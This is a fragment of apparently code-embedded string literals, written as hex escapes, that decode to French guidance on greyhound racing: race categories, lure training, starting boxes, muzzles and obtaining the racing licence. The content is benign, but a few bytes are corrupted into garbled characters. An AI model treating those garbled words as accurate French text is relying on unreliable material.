+"\x74\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\x65\x6e\x20" +"\x73\xe9\x72\x69\x65\x73\x2e\x0d\x45\x6c\x6c\x65\x73\x20\x64\x69" +"\x98\x66\xe8\x72\x65\x6e\x74\x20\x64\x65\x73\x20\x45\x2e\x4e\x2e" +"\x43\x2e\x20\x70\x61\x72\x20\x6c\x61\x20\x72\xe9\x70\x61\x72\x74" +"\x69\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x63\x61\x74\xe9\x67\x6f" +"\x72\x69\x65\x73\x20\x65\x6e\x20\x6c\x27\x61\x62\x73\x65\x6e\x63" +"\x65\x20\x64\x27\x75\x6e\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x69" +"\x6d\x70\x6f\x73\xe9\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65" +"\x2c\x20\x6d\x61\x69\x73\x20\x72\xe9\x75\x6e\x69\x73\x73\x65\x6e" +"\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x65\x73\x20\x63\x6f" +"\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x67\x72\x61" +"\x6e\x64\x65\x20\x76\x61\x6c\x65\x75\x72\x2e\x0d\x0d\x33\x29\x20" +"\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76\x65\x73\x20\x64\x65\x20" +"\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x56\x75\x65\x20" +"\x73\x75\x72\x20\x4c\x65\x75\x72\x72\x65\x20\x28\x45\x2e\x50\x2e" +"\x56\x2e\x4c\x2e\x29\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x64\x65" +"\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x64\x65\x75\x78" 
+"\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2c\x20\x72\x61" +"\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c\x27\x61\x70\x74\x69\x74\x75" +"\x64\x65\x20\xe0\x20\x6c\x61\x20\x63\x68\x61\x73\x73\x65\x2e\x20" +"\x4c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x6f\x75" +"\x72\x73\x75\x69\x76\x65\x6e\x74\x20\x75\x6e\x20\x6c\x65\x75\x72" +"\x72\x65\x20\x73\x75\x72\x20\x75\x6e\x20\x6c\x6f\x6e\x67\x20\x70" +"\x61\x72\x63\x6f\x75\x72\x73\x20\x65\x6e\x20\x73\x6c\x61\x6c\x6f" +"\x6d\x20\x63\x6f\x6d\x70\x72\x65\x6e\x61\x6e\x74\x20\x64\x65\x73" +"\x20\x6f\x62\x73\x74\x61\x63\x6c\x65\x73\x20\x65\x74\x20\x70\x6c" +"\x61\x63\xe9\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x6e\x61\x74\x75" +"\x72\x65\x2e\x20\x43\x68\x61\x63\x75\x6e\x20\x65\x73\x74\x20\x6a" +"\x75\x67\xe9\x20\x73\x75\x72\x20\x73\x6f\x6e\x20\x63\x6f\x6d\x70" +"\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\xe0\x20\x70\x61\x72\x74\x69" +"\x72\x20\x64\x65\x20\x73\x61\x20\x76\x69\x74\x65\x73\x73\x65\x2c" +"\x20\x73\x61\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x63\x65\x2c\x20" +"\x73\x6f\x6e\x20\x61\x72\x64\x65\x75\x72\x2c\x20\x73\x6f\x6e\x20" +"\x61\x73\x74\x75\x63\x65\x2c\x20\x73\x6f\x6e\x20\x63\x6f\x75\x72" +"\x61\x67\x65\x2c\x20\x65\x74\x20\x73\x6f\x6e\x20\x61\x72\x74\x20" +"\x64\x65\x20\x63\x61\x70\x74\x75\x72\x65\x20\xe0\x20\x6c\x27\x61" +"\x72\x72\x69\x76\x35\x65\x2e\x20\x41\x20\x6c\x27\xe9\x74\x72\x61" +"\x6e\x67\x65\x72\x20\x6c\x65\x73\x20\x45\x2e\x50\x2e\x56\x2e\x4c" +"\x2e\x20\x73\x6f\x6e\x74\x20\x61\x70\x70\x65\x6c\xe9\x65\x73\x20" +"\x43\x6f\x75\x72\x73\x69\x6e\x67\x20\x65\x74\x20\x6c\x65\x20\x6a" +"\x75\x67\x65\x6d\x65\x6e\x74\x20\x65\x73\x74\x20\x64\x69\x66\x66" +"\xe9\x72\x65\x6e\x74\x2e\x0d\x0d\x51\x75\x61\x6e\x64\x20\x65\x74" +"\x20\x63\x6f\x6d\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x6d\x65\x6e\x63" +"\x65\x72\x20\x3f\x0d\x4c\x65\x20\x6a\x65\x75\x6e\x65\x20\x4c\xe9" +"\x76\x72\x69\x65\x72\x20\x65\x73\x74\x20\x61\x6d\x65\x6e\xe9\x20" +"\x61\x75\x20\x74\x65\x72\x72\x61\x69\x6e\x20\xe0\x20\x75\x6e\x20" 
+"\xe2\x67\x65\x20\x63\x6f\x6d\x70\x72\x69\x73\x20\x67\xe9\x6e\xe9" +"\x72\x61\x6c\x65\x6d\x65\x6e\x74\x20\x65\x6e\x74\x72\x65\x20\x36" +"\x20\x6d\x6f\x69\x73\x20\x65\x74\x20\x31\x20\x61\x6e\x20\x73\x65" +"\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x2e\x20\x49\x6c\x20" +"\x64\x6f\x69\x74\x20\xea\x74\x72\x65\x20\x61\x73\x73\x65\x7a\x20" +"\x6a\x65\x75\x6e\x65\x20\x70\x6f\x75\x72\x20\x71\x75\x65\x20\x6c" +"\x27\x6f\x6e\x20\x70\x72\x6f\x66\x69\x74\x65\x20\x64\x65\x20\x73" +"\x61\x20\x74\x65\x6e\x64\x61\x6e\x63\x65\x20\x6e\x61\x74\x75\x72" +"\x65\x6c\x6c\x65\x20\xe0\x20\x6a\x6f\x75\x65\x72\x20\x65\x74\x20" +"\x63\x6f\x75\x72\x69\x72\x20\x61\x70\x72\xe8\x73\x20\x75\x6e\x20" +"\x6c\x65\x75\x72\x72\x65\x2c\x20\x6d\x61\x69\x73\x20\x61\x73\x73" +"\x65\x7a\x20\x66\x6f\x72\x6d\xe9\x20\x70\x6f\x75\x72\x20\x6e\x65" +"\x20\x70\x61\x73\x20\x72\x69\x73\x71\x75\x65\x72\x20\x64\x65\x20" +"\x6c\x75\x69\x20\x61\x62\xee\x6d\x65\x72\x20\x6c\x65\x20\x73\x71" +"\x75\x65\x6c\x65\x74\x74\x65\x20\x70\x61\x72\x20\x64\x65\x73\x20" +"\x65\x72\x72\x65\x75\x72\x73\x20\x20\x64\x27\x65\x6e\x74\x72\x61" +"\xee\x6e\x65\x6d\x65\x6e\x74\x2e\x20\x49\x6c\x20\x70\x6f\x75\x72" +"\x72\x61\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20\xe0\x20\x63" +"\x6f\x75\x72\x69\x72\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65" +"\x6d\x65\x6e\x74\x20\x61\x70\x72\xe8\x73\x20\x31\x32\x20\x6f\x75" +"\x20\x31\x35\x20\x6d\x6f\x69\x73\x20\x73\x65\x6c\x6f\x6e\x20\x6c" +"\x61\x20\x72\x61\x63\x65\x2e\x20\x0d\x0d\x4c\x65\x20\x64\x72\x65" +"\x73\x73\x61\x67\x65\x0d\x4f\x6e\x20\x63\x6f\x6d\x6d\x65\x6e\x63" +"\x65\x20\x70\x61\x72\x20\x6c\x27\x68\x61\x62\x69\x74\x75\x65\x72" +"\x20\x61\x75\x78\x20\x62\x72\x75\x69\x74\x73\x2c\x20\x61\x75\x78" +"\x20\x61\x62\x6f\x69\x65\x6d\x65\x6e\x74\x73\x2c\x20\xe0\x20\x6c" +"\x61\x20\x70\x72\xe9\x73\x65\x6e\x63\x65\x20\x64\x27\x61\x75\x74" +"\x72\x65\x73\x20\x63\x68\x69\x65\x6e\x73\x2c\x20\x65\x74\x20\x63" +"\x65\x6c\x61\x20\x70\x65\x75\x74\x20\x73\x65\x6e\x66\x61\x69\x72" 
+"\x65\x20\x74\x72\xe8\x73\x20\x74\xf4\x74\x2e\x20\x0d\x50\x75\x69" +"\x73\x20\x6f\x6e\x20\x6c\x75\x69\x20\x6d\x6f\x6e\x74\x72\x65\x20" +"\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x6f\x6e\x20" +"\x6c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x20\xe0\x20\x63\x6f" +"\x75\x72\x69\x72\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x2e\x0d\x44" +"\x27\x61\x75\x74\x72\x65\x73\x20\x70\x72\xe9\x66\xe8\x72\x65\x6e" +"\x74\x20\x70\x6c\x61\x63\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72" +"\x72\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x70\x6f\x75\x72" +"\x20\x71\x75\x27\x69\x6c\x20\x70\x61\x73\x73\x65\x20\xe0\x20\x67" +"\x72\x61\x6e\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65\x20\x64\x65" +"\x76\x61\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20" +"\x71\x75\x69\x20\x61\x20\x61\x6c\x6f\x72\x73\x20\x6c\x65\x20\x72" +"\xe9\x66\x6c\x65\x78\x65\x20\x64\x65\x20\x70\x61\x72\x74\x69\x72" +"\x20\xe0\x20\x73\x61\x20\x70\x6f\x75\x72\x73\x75\x69\x74\x65\x2e" +"\x20\x49\x6c\x20\x65\x73\x74\x20\x70\x72\xe9\x66\xe9\x72\x61\x62" +"\x6c\x65\x20\x64\x65\x20\x63\x6f\x6d\x6d\x65\x6e\x63\x65\x72\x20" +"\x76\x65\x72\x73\x20\x6c\x61\x20\x66\x69\x6e\x20\x64\x75\x20\x70" +"\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x6c\x65\x20\x70\x72\x6f\x70" +"\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x73\x65\x20\x74\x65\x6e\x61" +"\x6e\x74\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x65" +"\x74\x20\x75\x6e\x20\x74\x69\x65\x72\x73\x20\x61\x6d\x65\x6e\x61" +"\x6e\x74\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x75" +"\x20\x64\xe9\x70\x61\x72\x74\x2e\x20\x43\x6f\x6d\x6d\x65\x20\x63" +"\x65\x6c\x61\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6d\x6f\x74" +"\x69\x76\xe9\x20\xe0\x20\x6c\x61\x20\x66\x6f\x69\x73\x20\x70\x61" +"\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x74\x20\x72" +"\x65\x76\x65\x6e\x69\x72\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x75" +"\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x20\x71\x75" +"\x69\x20\x64\x6f\x69\x74\x20\x6c\x65\x20\x66\xe9\x6c\x69\x63\x69" 
+"\x74\x65\x72\x20\x62\x72\x75\x79\x61\x6d\x6d\x65\x6e\x74\x2e\x20" +"\x50\x65\x75\x20\xe0\x20\x70\x65\x75\x2c\x20\x6f\x6e\x20\x61\x6c" +"\x6c\x6f\x6e\x67\x65\x20\x6c\x61\x20\x64\x69\x73\x74\x61\x6e\x63" +"\x65\x20\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x70\x61\x72\x63\x6f" +"\x75\x72\x73\x20\x63\x6f\x6d\x70\x6c\x65\x74\x2e\x0d\x4d\x61\x69" +"\x73\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69" +"\x72\x20\x64\x65\x73\x20\x76\x61\x72\x69\x61\x6e\x74\x65\x73\x20" +"\x6d\x75\x6c\x74\x69\x70\x6c\x65\x73\x20\x73\x65\x6c\x6f\x6e\x20" +"\x6c\x65\x73\x20\x63\x6c\x75\x62\x73\x2e\x20\x43\x65\x72\x74\x61" +"\x69\x6e\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x66\x6f\x6e" +"\x74\x20\x6c\x65\x20\x74\x6f\x75\x72\x20\x63\x6f\x6d\x70\x6c\x65" +"\x74\x20\x64\x27\x65\x6d\x62\x6c\xe9\x65\x2c\x20\x64\x27\x61\x75" +"\x74\x72\x65\x73\x20\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20" +"\x64\x27\x75\x6e\x20\x67\x72\x61\x6e\x64\x20\x61\x70\x70\x72\x65" +"\x6e\x74\x69\x73\x73\x61\x67\x65\x2e\x20\x51\x75\x61\x6e\x64\x20" +"\x69\x6c\x20\x63\x6f\x75\x72\x74\x20\x62\x69\x65\x6e\x20\x61\x75" +"\x20\x6c\x65\x75\x72\x72\xbf\x2c\x20\x69\x6c\x20\x65\x73\x74\x20" +"\x70\x72\xea\x74\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x2e\x56" +"\x2e\x4c\x2e\x2e\x20\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x45\x2e" +"\x4e\x2e\x43\x2e\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x61\x70" +"\x70\x65\x6c\xe9\x65\x73\x20\x72\x61\x63\x69\x6e\x67\x2c\x20\x69" +"\x6c\x20\x64\x6f\x69\x74\x20\x61\x66\x66\x72\x6f\x6e\x74\x65\x72" +"\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20\x74\xe2\x63\x68\x65\x73" +"\x20\x3a\x20\x4c\x75\x69\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65" +"\x20\xe0\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x72\x20\x6c\x61\x20" +"\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x2c\x20\x6f\x62\x6c\x69\x67" +"\x61\x74\x6f\x69\x72\x65\x20\x70\x6f\x75\x72\x20\xe9\x76\x69\x74" +"\x65\x72\x20\x6c\x65\x73\x20\x62\x61\x74\x61\x69\x6c\x6c\x65\x73" +"\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9\x65\x20\x70\x6f\x75" 
+"\x72\x20\x6c\x61\x20\x63\x61\x70\x74\x75\x72\x65\x20\x64\x75\x20" +"\x6c\x65\x75\x72\x72\x65\x2e\x20\x49\x6c\x20\x73\x75\x66\x66\x69" +"\x74\x20\x64\x65\x20\x6c\x75\x69\x20\x6d\x65\x74\x74\x72\x65\x20" +"\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65\x20\x61\x76\x61" +"\x6e\x74\x20\x75\x6e\x20\x64\xe9\x70\x61\x72\x74\x20\x6f\x75\x20" +"\x75\x6e\x65\x20\x70\x72\x6f\x6d\x65\x6e\x61\x64\x65\x2c\x20\x70" +"\x6f\x75\x72\x20\x71\x75\x27\x69\x6c\x20\x61\x73\x73\x6f\x63\x69" +"\x65\x20\x6a\x6f\x69\x65\x20\x65\x74\x20\x6d\x75\x73\x65\x6c\x69" +"\xe8\x72\x65\x2e\x20\x43\x27\x65\x73\x74\x20\x61\x73\x73\x65\x7a" +"\x20\x66\x61\x63\x69\x6c\x65\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70" +"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72\x74\x69\x72\x20" +"\x65\x6e\x20\x62\x6f\x69\x74\x65\x20\x3a\x20\x65\x6e\x74\x72\x65" +"\x72\x20\x64\x61\x6e\x73\x20\x6c\x61\x20\x63\x61\x73\x65\x2c\x20" +"\x61\x74\x74\x65\x6e\x64\x72\x65\x20\x6c\x27\x6f\x75\x76\x65\x72" +"\x74\x75\x72\x65\x2c\x20\x62\x6f\x6e\x64\x69\x72\x2e\x20\x43\x27" +"\x65\x73\x74\x20\x65\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x74" +"\x72\xe8\x73\x20\x20\x66\x61\x63\x69\x6c\x65\x3b\x20\x70\x61\x72" +"\x66\x6f\x69\x73\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x6c\x75\x69" +"\x20\x61\x70\x70\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x70\x61\x72" +"\x74\x69\x72\x20\x64\x65\x73\x20\x62\x6f\x69\x74\x65\x73\x20\x6f" +"\x75\x76\x65\x72\x74\x65\x73\x2e\x0d\x4c\x75\x69\x20\x61\x70\x70" +"\x72\x65\x6e\x64\x72\x65\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72" +"\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x20\x63\x6f\x6e\x63" +"\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x43\x27\x65\x73\x74\x20\x75" +"\x6e\x20\x70\x6f\x69\x6e\x74\x20\x71\x75\x69\x20\x70\x65\x75\x74" +"\x20\xea\x74\x72\x65\x20\x64\xe9\x6c\x69\x63\x61\x74\x2e\x20\x53" +"\x69\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e\x27\x65" +"\x73\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x6d\x6f\x74" +"\x69\x76\xe9\x20\x61\x75\x20\x6c\x65\x75\x72\x72\x65\x2c\x20\x73" 
+"\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\xe9\x74\xe9\x20" +"\x74\x72\x6f\x70\x20\x70\x72\x65\x73\x73\xe9\x20\x64\x65\x20\x6c" +"\x65\x20\x6d\x65\x74\x74\x72\x65\x20\x65\x6e\x20\x67\x72\x6f\x75" +"\x70\x65\x20\x73\x61\x6e\x73\x20\x61\x74\x74\x65\x6e\x64\x72\x65" +"\x20\x75\x6e\x20\x62\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65" +"\x20\x65\x6e\x20\x73\x6f\x6c\x6f\x2c\x20\x76\x6f\x75\x73\x20\x61" +"\x6c\x6c\xce\x7a\x20\x61\x75\x20\x64\x65\x76\x61\x6e\x74\x20\x64" +"\x65\x20\x64\xe9\x73\x61\x67\x72\xe9\x6d\x65\x6e\x74\x73\x2e\x20" +"\x49\x6c\x20\x76\x61\x20\x6a\x6f\x75\x65\x72\x20\xe0\x20\x62\x6f" +"\x75\x73\x63\x75\x6c\x65\x72\x20\x6c\x65\x73\x20\x61\x75\x74\x72" +"\x65\x73\x20\x28\x6f\x6e\x20\x64\x69\x74\x20\x71\x75\x27\x69\x6c" +"\x20\x62\x6f\x75\x67\x65\x2c\x20\x71\x75\x27\x69\x6c\x20\x61\x74" +"\x74\x61\x71\x75\x65\x29\x20\x63\x6f\x6d\x6d\x65\x20\x64\x65\x73" +"\x20\x63\x68\x69\x6f\x74\x73\x20\x71\x75\x69\x20\x6a\x6f\x75\x65" +"\x6e\x74\x20\x65\x6e\x73\x65\x6d\x62\x6c\x65\x2e\x20\x4f\x75\x20" +"\x62\x69\x65\x6e\x20\x73\x69\x20\x6c\x65\x20\x6c\x65\x75\x72\x72" +"\x65\x20\x6e\x27\x61\x20\x70\x61\x73\x20\xe9\x74\xe9\x20\x70\x6c" +"\x61\x63\xe9\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20" +"\x62\x6f\x69\x74\x65\x20\x63\x6f\x6d\x6d\x65\x20\x6c\x65\x20\x76" +"\x65\x75\x74\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74" +"\x2c\x20\x6c\x65\x73\x20\x36\x20\x20\x4c\xe9\x76\x72\x69\x65\x72" +"\x73\x20\x76\x6f\x6e\x74\x20\x73\x65\x20\x70\x72\xe9\x63\x69\x70" +"\x69\x74\x65\x72\x20\x76\x65\x72\x73\x20\x6c\x65\x20\x70\x6f\x69" +"\x6e\x74\x20\x6f\xf9\x20\xe9\x74\x61\x69\x74\x20\x6c\x65\x20\x6c" +"\x65\x75\x72\x72\x65\x2c\x20\x64\x27\x6f\xf9\x20\x62\x6f\x75\x73" +"\x63\x75\x6c\x61\x64\x65\x2e\x0d\x44\x27\x61\x75\x74\x72\x65\x73" +"\x20\x6e\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x65\x6e\x74\x20\x70" +"\x61\x73\x20\x64\x27\xea\x74\x72\x65\x20\x72\x61\x74\x74\x72\x61" +"\x70\xe9\x73\x2c\x20\x6f\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9" 
+"\x73\x20\x61\x75\x20\x74\x6f\x75\x72\x6e\x61\x6e\x74\x20\x3a\x20" +"\x69\x6c\x73\x20\x73\x65\x20\x72\x65\x62\x69\x66\x66\x65\x6e\x74" +"\x2e\x0d\x44\x61\x6e\x73\x20\x74\x6f\x75\x73\x20\x63\x65\x73\x20" +"\x63\x61\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x6e" +"\x65\x20\x70\x65\x75\x74\x20\xea\x74\x72\x65\x20\x61\x63\x63\x65" +"\x70\x74\xe9\x20\x65\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4c" +"\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x76\x61\x20\x64\xe9" +"\x70\x65\x6e\x64\x72\x65\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20" +"\x61\x73\x73\x69\x64\x75\x69\x74\xe9\x20\xe0\x20\x6c\x27\x65\x6e" +"\x74\x72\x61\xee\x6e\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x64\x65" +"\x20\x6c\x61\x20\x76\x61\x6c\x65\x75\x72\x20\x64\x65\x73\x20\x6d" +"\x6f\x6e\x69\x74\x65\x75\x72\x73\x20\x64\x75\x20\x63\x6c\x75\x62" +"\x2e\x20\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x69\x76\x65" +"\x72\x73\x65\x73\x20\x6d\xe9\x74\x68\x6f\x64\x65\x73\x20\x70\x6f" +"\x75\x72\x20\x72\x65\x64\x72\x65\x73\x73\x65\x72\x20\x75\x6e\x20" +"\x61\x74\x74\x61\x71\x75\x61\x6e\x74\x20\x28\x71\x75\x69\x20\x65" +"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x65\x73\x74\x20\x75\x6e" +"\x20\x6a\x6f\x75\x65\x75\x72\x20\x6f\x75\x20\x75\x6e\x20\x63\x72" +"\x61\x69\x6e\x74\x69\x66\x2c\x20\x72\x61\x72\x65\x6d\x65\x6e\x74" +"\x20\x75\x6e\x20\x61\x67\x72\x65\x73\x73\x69\x66\x29\x2e\x0d\x56" +"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x61\x69" +"\x74\x20\x63\x6f\x75\x72\x69\x72\x20\x65\x6e\x20\x67\x72\x6f\x75" +"\x70\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\xea\x74\x20" +"\xe0\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x6c\x65\x20\x64\x72\x6f" +"\x69\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x2e\x0d\x0d\x4c" +"\x65\x20\x70\x61\x73\x73\x61\x67\x65\x20\x64\x75\x20\x42\x41\x43" +"\x0d\x50\x6f\x75\x72\x20\x63\x65\x6c\x61\x20\x69\x6c\x20\x64\x6f" +"\x69\x74\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x42\x72" +"\x65\x76\x65\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20" 
+"\x61\x75\x78\x20\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28\x42\x2e" +"\x41\x2e\x43\x2e\x29\x20\x20\x65\x74\x20\x75\x6e\x65\x20\x61\x74" +"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x76\x61\x6c" +"\x69\x64\x69\x74\xe9\x20\x28\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f" +"\x6c\x6f\x72\xe9\x2c\x20\x6c\x69\x63\x65\x6e\x63\x65\x29\x2e\x0d" +"\x0d\x4f\xf9\x3a\x0d\x4f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65" +"\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x20\x63\x6c\x75" +"\x62\x20\x61\x67\x72\xe9\xe9\x20\x64\x6f\x6e\x74\x20\x64\xe9\x70" +"\x65\x6e\x64\x20\x76\x6f\x74\x72\x65\x20\x6c\x69\x65\x75\x20\x64" +"\x65\x20\x72\xe9\x73\x69\x64\x65\x6e\x63\x65\x20\x28\x73\x61\x75" +"\x66\x20\x50\x61\x72\x69\x73\x20\x6f\xf9\x20\x63\x68\x61\x71\x75" +"\x65\x20\x63\x6c\x75\x62\x20\x63\x6f\x75\x76\x72\x65\x20\x6c\x27" +"\x49\x6c\x65\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x29\x2e\x20" +"\x4d\x61\x69\x73\x20\x73\x75\x72\x20\x64\x65\x6d\x61\x6e\x64\x65" +"\x20\x6d\x6f\x74\x69\x76\xe9\x65\x20\x76\x6f\x75\x73\x20\x70\x6f" +"\x75\x76\x65\x7a\x20\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x65" +"\x20\x64\xe9\x72\x6f\x67\x61\x74\x69\x6f\x6e\x20\x70\x6f\x75\x72" +"\x20\x61\x6c\x6c\x65\x72\x20\x61\x69\x6c\x6c\x65\x75\x72\x73\x2c" +"\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x50\x72\xe9" +"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x63\x6c\x75\x62\x20\x61" +"\x74\x74\x72\x69\x62\x75\x74\x61\x69\x72\x65\x2c\x20\x73\x6f\x69" +"\x74\x20\x65\x6e\x20\x63\x61\x73\x20\x72\x65\x66\x75\x73\x2c\x20" +"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f" +"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x2e\x20\x49\x6c\x20\x66" +"\x61\x75\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x75\x6e\x20" +"\x6d\x6f\x74\x69\x66\x20\xe9\x63\x72\x69\x74\x2e\x0d\x0d\x43\x6f" +"\x6d\x6d\x65\x6e\x74\x20\x3a\x0d\x31\x29\x20\x56\x6f\x75\x73\x20" +"\xe9\x63\x72\x69\x76\x65\x7a\x20\xe0\x20\x6c\x61\x20\x53\x6f\x63" +"\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61\x6c\x65\x20\x43\x61" 
+"\x6e\x69\x6e\x65\x20\x71\x75\x69\x20\x76\x6f\x75\x73\x20\x76\x65" +"\x6e\x64\x20\x75\x6e\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20" +"\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x64\x6f\x6e\x74\x20\x6c\x65" +"\x20\x6d\x6f\x64\xe8\x6c\x65\x20\x65\x73\x74\x20\x64\xe9\x73\x6f" +"\x72\x6d\x61\x69\x73\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x6f\x75" +"\x72\x20\x6c\x61\x20\x46\x72\x61\x6e\x63\x65\x20\x65\x74\x20\x6c" +"\x27\xe9\x74\x72\x61\x6e\x67\x65\x72\x2c\x20\x6d\x61\x69\x73\x20" +"\x71\x75\x69\x20\x6e\x65\x20\x73\x75\x66\x66\x69\x74\x20\x70\x61" +"\x73\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x69\x72\x2e\x20\x0d" +"\x50\x75\x69\x73\x20\x76\x6f\x75\x73\x20\xe9\x63\x72\x69\x76\x65" +"\x7a\x20\x61\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x64" +"\x65\x20\x43\x6c\x75\x62\x20\x70\x6f\x75\x72\x20\x6c\x75\x69\x20" +"\x64\x65\x6d\x61\x6e\x64\x65\x72\x20\x75\x6e\x20\x70\x61\x73\x73" +"\x61\x67\x65\x20\x64\x65\x20\x42\x41\x43\x2c\x20\x61\x75\x20\x6d" +"\x6f\x69\x6e\x73\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20" +"\x6c\x27\x61\x76\x61\x6e\x63\x65\x2e\x20\x44\xe8\x73\x20\x71\x75" +"\x65\x20\x6c\x61\x20\x64\x61\x74\x65\x20\x65\x73\x74\x20\x66\x69" +"\x78\xe9\x65\x2c\x20\x76\x6f\x75\x73\x20\x76\x65\x6e\x65\x7a\x20" +"\x61\x76\x65\x63\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x72\x6e\x65" +"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x2c\x20\x6c\x61" +"\x20\x70\x68\x6f\x74\x6f\x63\x6f\x70\x69\x65\x20\x64\x75\x20\x70" +"\x65\x64\x69\x67\x72\x65\x65\x20\x65\x74\x20\x6c\x61\x20\x63\x61" +"\x72\x74\x65\x20\x64\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e" +"\x0d\x53\x65\x75\x6c\x20\x6c\x65\x73\x20\x4c\xe9\x76\x72\x69\x65" +"\x72\x73\x20\x63\x6f\x6e\x66\x69\x72\x6d\xe9\x73\x2c\x20\x64\x6f" 